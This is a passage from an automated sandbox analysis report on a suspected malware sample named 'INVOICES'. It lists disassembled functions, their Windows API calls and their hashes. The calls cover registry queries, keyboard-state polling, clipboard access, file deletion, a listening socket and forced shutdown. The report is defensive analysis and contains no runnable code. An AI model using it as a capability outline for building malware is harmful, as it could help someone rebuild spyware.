                                                                                                                                  • API String ID: 0-3579807247
                                                                                                                                  • Opcode ID: 2bf85eec80d4a34288f6429defd73730fba5bdc3f57b5952a7b9d321f7c5624d
                                                                                                                                  • Instruction ID: 6e31f322044e6cc1d33adf8dc8dda464bf97ff3503c455f53fbdb99de12c85aa
                                                                                                                                  • Opcode Fuzzy Hash: 2bf85eec80d4a34288f6429defd73730fba5bdc3f57b5952a7b9d321f7c5624d
                                                                                                                                  • Instruction Fuzzy Hash: 8AA29070E0421ACBDF28CF58C9447ADB7B1FB54354F24C1AAD859A7280E7789E81EF51
                                                                                                                                  Function 007B0465 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 007B0EA5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007AFE38,?,?), ref: 007B0EBC
                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007B0537
                                                                                                                                    • Part of subcall function 00739997: __itow.LIBCMT ref: 007399C2
                                                                                                                                    • Part of subcall function 00739997: __swprintf.LIBCMT ref: 00739A0C
                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 007B05D6
                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 007B066E
                                                                                                                                  • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 007B08AD
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 007B08BA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1240663315-0
                                                                                                                                  • Opcode ID: d5400deaf03bacdca0ed119d0e89216d61bcd6fc3f3dac77e904ab7cc6cb0f22
                                                                                                                                  • Instruction ID: 6ebe60fd15c6e8e31e2fa12a88bc9734244e9f76ac96cbf8ba333fc1f0a77f38
                                                                                                                                  • Opcode Fuzzy Hash: d5400deaf03bacdca0ed119d0e89216d61bcd6fc3f3dac77e904ab7cc6cb0f22
                                                                                                                                  • Instruction Fuzzy Hash: 45E13D71604210EFCB14DF29C895E6BBBE5EF88714F04856DF48ADB262DB38E905CB91
                                                                                                                                  Function 0079003A Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetKeyboardState.USER32(?), ref: 00790062
                                                                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 007900E3
                                                                                                                                  • GetKeyState.USER32(000000A0), ref: 007900FE
                                                                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00790118
                                                                                                                                  • GetKeyState.USER32(000000A1), ref: 0079012D
                                                                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00790145
                                                                                                                                  • GetKeyState.USER32(00000011), ref: 00790157
                                                                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 0079016F
                                                                                                                                  • GetKeyState.USER32(00000012), ref: 00790181
                                                                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00790199
                                                                                                                                  • GetKeyState.USER32(0000005B), ref: 007901AB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: State$Async$Keyboard
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 541375521-0
                                                                                                                                  • Opcode ID: 314187a7c937e87e7be43af55561e182d0c64b9b83f1f4e32d8dce9fcf71fd20
                                                                                                                                  • Instruction ID: fbfb6e07ce05a5e33e9b4dc65be9e17b69c198405c1233f05c4d999354284658
                                                                                                                                  • Opcode Fuzzy Hash: 314187a7c937e87e7be43af55561e182d0c64b9b83f1f4e32d8dce9fcf71fd20
                                                                                                                                  • Instruction Fuzzy Hash: 4841D9346547CE6EFF318A64AC047B9BEA1BF11340F088099D9C6461C2EB9D99D4C7E2
                                                                                                                                  Function 007A427A Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1737998785-0
                                                                                                                                  • Opcode ID: 56f7b26b7aa7e4c867122d2238d7a33344d83ca08e91d4fd25afaaba88964fce
                                                                                                                                  • Instruction ID: 8734330f30a5a14c6ba757dc6e66c5093a807493b708a35cc4a876d19555dc25
                                                                                                                                  • Opcode Fuzzy Hash: 56f7b26b7aa7e4c867122d2238d7a33344d83ca08e91d4fd25afaaba88964fce
                                                                                                                                  • Instruction Fuzzy Hash: 5F217E35200210DFEB10AF64DC49F6D7BA8FF84B15F10C216F9469B2A1DB79AC01CB59
                                                                                                                                  Function 00793833 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 007348AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007348A1,?,?,007337C0,?), ref: 007348CE
                                                                                                                                    • Part of subcall function 00794AD8: GetFileAttributesW.KERNEL32(?,0079374F), ref: 00794AD9
                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 007938E7
                                                                                                                                  • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0079398F
                                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 007939A2
                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 007939BF
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 007939E1
                                                                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?), ref: 007939FD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                                                                  • String ID: \*.*
                                                                                                                                  • API String ID: 4002782344-1173974218
                                                                                                                                  • Opcode ID: b73a9c429d6c999d77c41b10516ecf0bd315f938bce5e09defe6ff357989593b
                                                                                                                                  • Instruction ID: 946fe0ed8af7971c4785979118602252e3e13be8d63737193aafe20a3d22871c
                                                                                                                                  • Opcode Fuzzy Hash: b73a9c429d6c999d77c41b10516ecf0bd315f938bce5e09defe6ff357989593b
                                                                                                                                  • Instruction Fuzzy Hash: CE51907180510DDADF15EBA0ED9AEEDB778AF14314F648169E44277092EF386F09CB60
                                                                                                                                  Function 0079F47F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00737F41: _memmove.LIBCMT ref: 00737F82
                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0079F4CC
                                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 0079F4FC
                                                                                                                                  • _wcscmp.LIBCMT ref: 0079F510
                                                                                                                                  • _wcscmp.LIBCMT ref: 0079F52B
                                                                                                                                  • FindNextFileW.KERNEL32(?,?), ref: 0079F5C9
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0079F5DF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                                  • String ID: *.*
                                                                                                                                  • API String ID: 713712311-438819550
                                                                                                                                  • Opcode ID: 1a2f4e0e665bb74a7e1cae04437884006e1476e58370cd13549fb1c11d3b8852
                                                                                                                                  • Instruction ID: afd7003b297ce0d6294eac2a7b81d3d810f7545237c4baf8fa31b24639fd19a3
                                                                                                                                  • Opcode Fuzzy Hash: 1a2f4e0e665bb74a7e1cae04437884006e1476e58370cd13549fb1c11d3b8852
                                                                                                                                  • Instruction Fuzzy Hash: BB417F7190021AAFDF14DFA4DC49AEEBBB4FF04310F144566E819E32A1EB389E54CB90
                                                                                                                                  Function 007BD4A8 Relevance: 12.3, APIs: 8, Instructions: 257windownativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00732612: GetWindowLongW.USER32(?,000000EB), ref: 00732623
                                                                                                                                  • GetSystemMetrics.USER32(0000000F), ref: 007BD4E6
                                                                                                                                  • GetSystemMetrics.USER32(0000000F), ref: 007BD506
                                                                                                                                  • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 007BD741
                                                                                                                                  • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 007BD75F
                                                                                                                                  • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 007BD780
                                                                                                                                  • ShowWindow.USER32(00000003,00000000), ref: 007BD79F
                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 007BD7C4
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 007BD7E7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$MessageMetricsSendSystem$DialogInvalidateLongMoveNtdllProc_RectShow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 830902736-0
                                                                                                                                  • Opcode ID: 44a28a9ab0338c26044af987c34da3b913149980dbfe337b80c84c8c7c4c2c44
                                                                                                                                  • Instruction ID: bcc0283d806519dced6eb5f3c4148e7b7ef2a9a08f45f0523d76b387615ff663
                                                                                                                                  • Opcode Fuzzy Hash: 44a28a9ab0338c26044af987c34da3b913149980dbfe337b80c84c8c7c4c2c44
                                                                                                                                  • Instruction Fuzzy Hash: A3B18975600625EFDF24CF28C989BED7BB1BF08715F088169ED489B295EB38AD50CB50
                                                                                                                                  Function 007458C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4104443479-0
                                                                                                                                  • Opcode ID: 727b0fb3922872e54d3166deee60ba460d922b89b0b58b6f977c81cbbe063c7d
                                                                                                                                  • Instruction ID: fbb3507db9760b7b3a911f717fed732cfe2534a77f877ba4c14fda5cea2b6e74
                                                                                                                                  • Opcode Fuzzy Hash: 727b0fb3922872e54d3166deee60ba460d922b89b0b58b6f977c81cbbe063c7d
                                                                                                                                  • Instruction Fuzzy Hash: 53129D70A00609DFDF14DFA5D985AEEB7F5FF48300F108529E806A7292EB39AD15CB90
                                                                                                                                  Function 00745680 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 516COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00750F36: std::exception::exception.LIBCMT ref: 00750F6C
                                                                                                                                    • Part of subcall function 00750F36: __CxxThrowException@8.LIBCMT ref: 00750F81
                                                                                                                                  • _memmove.LIBCMT ref: 007805AE
                                                                                                                                  • _memmove.LIBCMT ref: 007806C3
                                                                                                                                  • _memmove.LIBCMT ref: 0078076A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                                  • String ID: yZt
                                                                                                                                  • API String ID: 1300846289-3009251894
                                                                                                                                  • Opcode ID: 61e25bbfa183a103818ceccce0f661fac465bfda3051e28bcb5feb6ae0af538f
                                                                                                                                  • Instruction ID: 9aa77f811724a4543d66cb6befd1a96fa870a0b69ac0a69e91f3ac705bec2167
                                                                                                                                  • Opcode Fuzzy Hash: 61e25bbfa183a103818ceccce0f661fac465bfda3051e28bcb5feb6ae0af538f
                                                                                                                                  • Instruction Fuzzy Hash: 0902C0B0A00209DFDF14DF64D985AAEBBB5FF44300F148069E806DB296EB39DE55CB91
                                                                                                                                  Function 00795264 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00788AA3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00788AED
                                                                                                                                    • Part of subcall function 00788AA3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00788B1A
                                                                                                                                    • Part of subcall function 00788AA3: GetLastError.KERNEL32 ref: 00788B27
                                                                                                                                  • ExitWindowsEx.USER32(?,00000000), ref: 007952A0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                  • String ID: $@$SeShutdownPrivilege
                                                                                                                                  • API String ID: 2234035333-194228
                                                                                                                                  • Opcode ID: 3d017e079e7a220124cbb9ab9ca3650379971d097c5e58be31061bbd19ca34ae
                                                                                                                                  • Instruction ID: b15a8a99347d0714eb474680da9f7d5033a5daf517bc2f16eb9caaccd32bdfe3
                                                                                                                                  • Opcode Fuzzy Hash: 3d017e079e7a220124cbb9ab9ca3650379971d097c5e58be31061bbd19ca34ae
                                                                                                                                  • Instruction Fuzzy Hash: 1701F2B2694622AAEF2A2778BC4BFBA7258FB09741F244225F907D20D2D96C5C008394
                                                                                                                                  Function 00743190 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 587COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __itow__swprintf
                                                                                                                                  • String ID: Oat
                                                                                                                                  • API String ID: 674341424-2936667180
                                                                                                                                  • Opcode ID: ca48f11bf3c2a7a4f6491a4b411a1bae45441f814c09615ab14667756f815673
                                                                                                                                  • Instruction ID: 12b25183a03025606f8734c004887f7c90294b9f6842da476bc815a193a78b31
                                                                                                                                  • Opcode Fuzzy Hash: ca48f11bf3c2a7a4f6491a4b411a1bae45441f814c09615ab14667756f815673
                                                                                                                                  • Instruction Fuzzy Hash: EB227C71608301DFD724DF24C885BAEB7E4BF84714F10891DF99A97292DB79EA04CB92
                                                                                                                                  Function 007A6399 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 007A63F2
                                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 007A6401
                                                                                                                                  • bind.WS2_32(00000000,?,00000010), ref: 007A641D
                                                                                                                                  • listen.WS2_32(00000000,00000005), ref: 007A642C
                                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 007A6446
                                                                                                                                  • closesocket.WS2_32(00000000), ref: 007A645A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1279440585-0
                                                                                                                                  • Opcode ID: cc8d201ca0561f680767d78c55c76eafd5b0097eb1167d68b40c4928a44ffbc8
                                                                                                                                  • Instruction ID: 93a22dccfc3b488f6e4dae89e85808426ec8fe7fe726c62a11659b38489796e6
                                                                                                                                  • Opcode Fuzzy Hash: cc8d201ca0561f680767d78c55c76eafd5b0097eb1167d68b40c4928a44ffbc8
                                                                                                                                  • Instruction Fuzzy Hash: 502191346002049FDB10EF64CD49F6EB7E9EF89720F148269E95AA7292CB78AD01CB51
                                                                                                                                  Function 00731287 Relevance: 7.9, APIs: 5, Instructions: 379nativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00732612: GetWindowLongW.USER32(?,000000EB), ref: 00732623
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 007319FA
                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00731A4E
                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 00731A61
                                                                                                                                    • Part of subcall function 00731290: NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 007312D8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ColorDialogNtdllProc_$LongWindow
                                                                                                                                  • String ID:
